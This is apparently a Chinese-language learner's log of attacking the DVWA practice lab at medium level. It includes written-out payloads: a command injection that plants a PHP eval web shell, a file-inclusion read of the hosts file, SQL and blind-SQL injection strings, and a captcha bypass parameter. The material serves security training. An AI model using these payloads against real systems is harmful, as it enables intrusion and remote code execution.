暴力破解-见了鬼了,中级的反而是get请求而且没有token,直接Top100。看到有一个不一样的返回长度值,返回到重发器测一下,通过;
命令执行-还是192.168.3.1|dir,看到回显目录C:\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\exec,然后对比URL构造一个php文件192.168.3.1|echo " <?php eval($_POST['soc']);?> " > C:\phpStudy\PHPTutorial\WWW\DVWA\2.php,链接蚁剑成功;
跨站请求伪造-抓包发现有个referer字段,百度一下referer绕过和伪造;之前是我太钻牛角尖,想着在页面中伪造,经过老师点拨,原来可以二次伪造信息;
文件包含-还是看到4.php,然后尝试http://192.168.3.130/DVWA/vulnerabilities/fi/?page=C:\WINDOWS\system32\drivers\etc\hosts;
文件上传-上传发现对文件格式有要求,抓包发现还有大小要求;尝试改名上传,直接过了没有报错;然后尝试抓包在包里改名重发,也能过,连接成功;
不安全的验证码-继续懵逼中…看看前端代码,嗯,还是看到隐藏的表单,还有google的js,嗯,看不懂;还是先从隐藏表单下手,改数值,发包,没效果。。。;看看后台代码,先用之前的命令执行漏洞把copy源代码文件到同级目录下的1.txt,打开查看;发现实际页面代码另有一份medium.php(应该是根据等级选的),于是再来复制一遍;看到代码中有一段php写进去的,在验证码生效以后才会出现的参数passed_captcha,直接添加到数据包,发送,过;
SQL注入-POST请求1 or 1=1–+
SQL盲注-抓包提示1有数据,改为6提示没有数据;1 and 1=1–+没问题,还是一个一个猜id=1 and length(database())>4#报错,说明数据库四个字符,盲猜是dvwa,id=1 and ascii(substr(database(),1,1))=100#正确,后面估计没问题;
Session会话漏洞-和之前差不多,但是多了一个项目,看起来像个时间戳,在线转换工具确实是;
XSSdom-试了半天,对</和
XSS反射-也是过滤了,继续1234;
XSS存储-还是过滤了,继续1234;
绕过内容安全策略(CSP)-不会,等以后再做
前端攻击-嗯…也不会,看了答案决定暂时告一段落,开始做别的靶场,等水平上去了再继续做。
HIGH-暂时搁置,做更基础的,水平不够